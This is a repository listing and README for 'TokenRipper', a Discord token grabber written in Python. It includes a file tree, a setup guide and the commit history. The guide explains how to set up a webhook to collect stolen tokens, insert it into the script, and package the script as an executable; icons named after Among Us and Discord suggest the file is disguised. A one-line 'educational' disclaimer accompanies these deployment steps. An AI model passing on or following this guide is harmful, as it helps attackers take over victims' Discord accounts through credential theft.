======================: FILES :======================
TokenRipper
├── icons
│   ├── amongus.ico
│   └── discord.ico
├── pyinstaller.py
├── README.md
├── requirements.txt
└── ripper.py

1 directory, 6 files
======================: README CONTENT :======================
<h1 align="center">Token Ripper</h1>
<p align="center">Discord Token Grabber | Written In Python.</p>

# Guide:
1. PIP install requirements.txt. ("pip install -r requirements.txt").
2. Create a server and a webhook.
3. Replace 'WEBHOOK URL HERE' with your webhook in [ripper.py](https://github.com/kcybe/TokenRipper/blob/31be03695b6b6e57e63f3ce4b049d6e53c1f8eac/ripper.py#L5) and save the file.

![image](https://user-images.githubusercontent.com/75665158/116714920-e5e8b880-a9de-11eb-92b5-7676c5a71929.png)

# Extra (Make Executable):
1. Use pyinstaller.py to create a pyinstaller script.
2. Run pyinstaller.bat.
3. Executeable file will be created at dist folder.

Note: Please use Token Ripper as an educational source only.
====================== GIT HISTORY: ======================
d503faa HEAD@{0}: clone: from https://github.com/kcybe/TokenRipper
commit d503faaa063220a2baff35b61e8ff0abfd47cf3a
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Sat May 1 01:00:08 2021 +0300

    Update README.md

commit 8593d75e3cd159ad543d2d67048311c6164f648b
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Fri Apr 30 18:35:25 2021 +0300

    Update README.md

commit f8f0e57d76433eaa25533be284be5de6c23adfae
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Fri Apr 30 18:26:33 2021 +0300

    Update README.md

commit 31be03695b6b6e57e63f3ce4b049d6e53c1f8eac
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Fri Apr 30 18:19:43 2021 +0300

    Add files via upload

commit 95390fc37b454920a7f014ca0da28424f93817c1
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Fri Apr 30 18:18:56 2021 +0300

    Update README.md

commit d803c7dda351b6c7a4e2672c82b4bb93ee5c3b36
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Fri Apr 30 18:17:43 2021 +0300

    Update README.md

commit 1343780e63f52013292c4f0353ff897274fe4dfe
Author: kcybe <75665158+kcybe@users.noreply.github.com>
Date:   Fri Apr 30 17:57:10 2021 +0300

    Initial commit
